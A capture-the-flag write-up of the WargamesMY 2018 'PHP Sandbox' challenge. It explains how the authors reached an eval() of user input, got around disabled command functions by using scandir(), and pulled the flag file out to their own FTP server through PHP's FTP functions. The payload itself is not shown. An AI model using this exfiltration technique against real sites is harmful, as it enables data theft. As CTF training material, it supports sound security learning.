Interactive Coloring

drag iconDrag any color from the left toolbar to an area or text in the page. A blue outline will indicate a droppable element.

drag iconOn mobile, wait a tiny bit until you drag the color drop.

WargamesMY CTF 2018: PHP Sandbox

WargamesMY CTF 2018: PHP Sandbox.

P/S: We forgot to take screenshots for the writeup on this one, luckily there still Burp history available.

View page source we found <!– source code ./source.txt –> in html comment. View source.txt we got:

wargamesMY ctf php sandbox

Basically it is a single web page & form that take user input in parameter code and pass into eval() function.

Great! never think WGMY web challenge will be this ez pz. Lets try to do RCE..

wargamesMY ctf php sandbox

Snap! never under estimate the troll level of WGMY challenge author. All command execution function is disabled. var_dump(ini_get(‘disable_functions’)); reveal all the disabled function:

So that explain why the name of the challenge is PHP Sandbox.

Later we found scandir() is usable and reveal the target flag file .supers3cr37file.php in the same www directory.

wargamesMY ctf php sandbox

Most of the read/view file function is also disabled (maybe not all, we just cant think of any else at that time). Later we found FTP Function is usable. The idea is to transfer the flag back to us via FTP, so we run FTP server in our box.

Submit above code.

wargamesMY ctf php sandbox

Target flag file were successfully transfer to our box and finally,

$ cat flagphpsandbox.txt
<?php /*$flag = ‘wgmy{func_bl4ck1ist_1z_s0_b4d}’;*/ ?>

Flag : wgmy{func_bl4ck1ist_1z_s0_b4d}

References: PHP Scandir Function
Read All Writeup : WargamesMY CTF 2018 Writeup

This website use cookies to ensure that you have the best experience on this website.